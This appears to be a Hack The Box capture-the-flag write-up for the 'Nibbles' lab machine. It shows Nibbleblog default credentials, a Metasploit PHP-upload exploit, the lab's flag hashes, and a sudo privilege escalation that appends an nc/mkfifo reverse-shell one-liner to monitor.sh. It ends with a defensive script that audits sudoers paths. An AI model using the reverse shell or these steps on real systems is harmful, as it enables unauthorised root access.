# Nibbles

## Nibbles - 10.10.10.75

### Target Enumeration:

OS: Linux

IP: 10.10.10.75

User: b02ff32bb332deba49eeaed21152c8d8

Root: b6d745c0dfb6457c55591efc898ef88c

### Ports / Services / Software Versions Running

80/tcp open http Apache httpd 2.4.18

### Vulnerability Exploited:

Nibbleblog contains a flaw that allows an authenticated remote attacker to execute arbitrary PHP code.

### Exploiting the host:

Nmap

<div align="left"><img src="https://lh4.googleusercontent.com/420APuMpnY5dzCZSqWVD523n5g_W8pKJaiIIeGzQnqPrXd328dtykVKJk45av0SoALhP15ko5HzGsc1QRJHbBLsYlZ9OfUd_ny0urfG5iZyHebgDefpNUu87cTniOTn6gmVWTw7X" alt=""></div>

Visiting Port 80 and viewing the source code gives us the following:

<div align="left"><img src="https://lh6.googleusercontent.com/sMizMZOZAsyc395wV0AAG4RBAmn8tMVE9Cl3SK0fmD0fA9QLzK7_EeF-EzmNfvroYn8CkvoDvY3A4Es0rHKYAqotsdF0JyREN6NmAznQWyHeSI_wDfD1pluD_347NvWlKgf8A6xC" alt=""></div>

Using dirb against /nibbleblog gives us admin.php, which is a login interface.

Testing default usernames and passwords gives us admin:nibbles.

Searching for exploits gives us:

<div align="left"><img src="https://lh4.googleusercontent.com/5_clk_XuwBYZKsDyL-JBzWEyQ1YIsF4Xf5HDZimgEPN3WG8BrjwWejlKkg3imGb2Ykpbb29Eitrmun2993SoIk3b6aB07wuMPxZIBIGrNdPasCNYYKF7Y3NMmu4YV6ZDLHUcfiRz" alt=""></div>

We load Metasploit and configure our options as follows:

![](https://lh6.googleusercontent.com/xoco6o95stqAIDhpSGwd7AQJHP-H_2tBS_PAHDmQW2QzfnVdziah9C1m9v4TBq13X0VvH0MJHD0CvV5XAFH8QM7wiqHMbsc5mqEfoi1RY4Zcb41PlYucXkTzapSuAubFhaBRssm2)

Run the exploit to get a shell as the low-privileged user nibbles:

![](https://lh5.googleusercontent.com/C3-5CAthS0662Q5SOKd5hXi9L6Tn7f7MsF5Lhbxodg7gN1SMoYp2W8hVbX45wMF_ctR8xpzx-FIjtieVE_xW6v4bUmsR95jGk1Z5d53KSvHjtVdIRCJDv51RpE6bDEebS5KefEZj)

Running LinEnum.sh on the host gives us a potential lead.

<div align="left"><img src="https://lh4.googleusercontent.com/LDGUHiqopRx9z334InU4SKnmlO5L3R8_o37izQDJuv3OBWS6Rx6HhS1WKshonDx_s7DyO5Yzf8MHHebtn1UFYbklr1qUzwZydBN0zMOgMlG35FfKVLFEckyjnI29Uf-60RFTz3L0" alt=""></div>

So we need to unzip personal.zip within /home/nibbler and modify monitor.sh to get root.

<div align="left"><img src="https://lh3.googleusercontent.com/e_Dm39PPslm7aFuw8_jTZII3MQEWJxEcunw52JReAPBAexEXp8Stkpl0f_nRiEcn_kMaMJBcjK1v1wjYmDIPkwYzIPuqtoxMXASUFMiQL0QP64Lvx2mPpfhytlaRmXXJKeCCx52M" alt=""></div>

We set up a nc listener on port 2491 locally and we insert the following command into the monitor.sh file:

```
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.49 2491 >/tmp/f" >> monitor.sh
```

We then execute the monitor.sh file with /usr/bin/sudo to receive our root shell.

<div align="left"><img src="https://lh6.googleusercontent.com/w-6LVMBsAw2AOCm1Ge5qb7k6oUgGH0oWxGN872gwDfJqRkL30sCx79C01uPh98YzgTLhlk1u5pwAV5k2DWbVSraSooLwMmdTy9Vbgl7kCrz3m133tQ3uMr53LR0-GgXv0X82t6p5" alt=""></div>

And we receive a root shell in return.

<div align="left"><img src="https://lh4.googleusercontent.com/0AeFJXDNIcZ3xav-z4fz1-ecaIjn7kTNpnJNgHabxTKlQqL1majEDQCePsCrmQaPIqrl2eoQPeI35CPblt0y9czGCJbbnIf2gDFIZKEvMkaXwtZlmGAGtlOThKMwR-Vv2Cv5IHoc" alt=""></div>
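The escalation above works because sudo runs, as root, a script whose path sits under a directory the low-privileged user controls. The following Python audit is an added example, not part of the original write-up: it flags sudoers command paths that a non-root user could create or replace. The sudoers text, paths, uids and modes are constructed sample data (assumptions), and the filesystem is modelled as a dict so the check runs offline.

```python
import posixpath
import re
import stat

# Constructed sample data (not taken from the target): sudoers rules and file metadata.
SUDOERS = """\
Defaults env_reset
nibbler ALL=(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
backup  ALL=(root) NOPASSWD: /usr/local/sbin/rotate-logs, /opt/tools/sync.sh --all
"""
# path -> (owner uid, st_mode); personal/ does not exist until personal.zip is unpacked
FS = {
    "/": (0, 0o40755), "/home": (0, 0o40755), "/home/nibbler": (1001, 0o40755),
    "/usr": (0, 0o40755), "/usr/local": (0, 0o40755), "/usr/local/sbin": (0, 0o40755),
    "/usr/local/sbin/rotate-logs": (0, 0o100755), "/opt": (0, 0o40755),
    "/opt/tools": (0, 0o40775), "/opt/tools/sync.sh": (0, 0o100755),
}
SPEC = re.compile(r"^(?!Defaults|\w+_Alias)(\S+)\s+\S+\s*=\s*(?:\([^)]*\)\s*)?(.+)$")
TAGS = re.compile(r"^(?:[A-Z_]+:\s*)+")  # NOPASSWD:, SETENV:, ...

def writable_by_untrusted(path, fs, trusted=(0,)):
    """Return why a non-trusted uid could replace `path`, or None if it cannot."""
    cur = posixpath.normpath(path)
    while True:
        meta = fs.get(cur)  # a missing entry is controlled by its nearest existing parent
        if meta is not None:
            uid, mode = meta
            if uid not in trusted:
                return f"{cur} is owned by uid {uid}"
            if mode & (stat.S_IWGRP | stat.S_IWOTH):  # conservative: sticky dirs too
                return f"{cur} is group/world-writable"
        if cur == "/":
            return None
        cur = posixpath.dirname(cur)

def audit(sudoers, fs):
    """List (user, command path, reason) for sudo targets a non-root user can rewrite."""
    findings = []
    for line in sudoers.splitlines():
        m = SPEC.match(line.split("#", 1)[0].strip())
        for cmd in m.group(2).split(",") if m else ():
            words = TAGS.sub("", cmd.strip()).split()
            if words and words[0].startswith("/") and (
                    reason := writable_by_untrusted(words[0], fs)):
                findings.append((m.group(1), words[0], reason))
    return findings

if __name__ == "__main__":
    for user, path, reason in audit(SUDOERS, FS):
        print(f"{user}: {path} -> {reason}")
```

On a live host the `FS` lookup would be replaced with `os.lstat` results; any finding means the sudo rule should point at a root-owned script in a root-owned directory instead.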

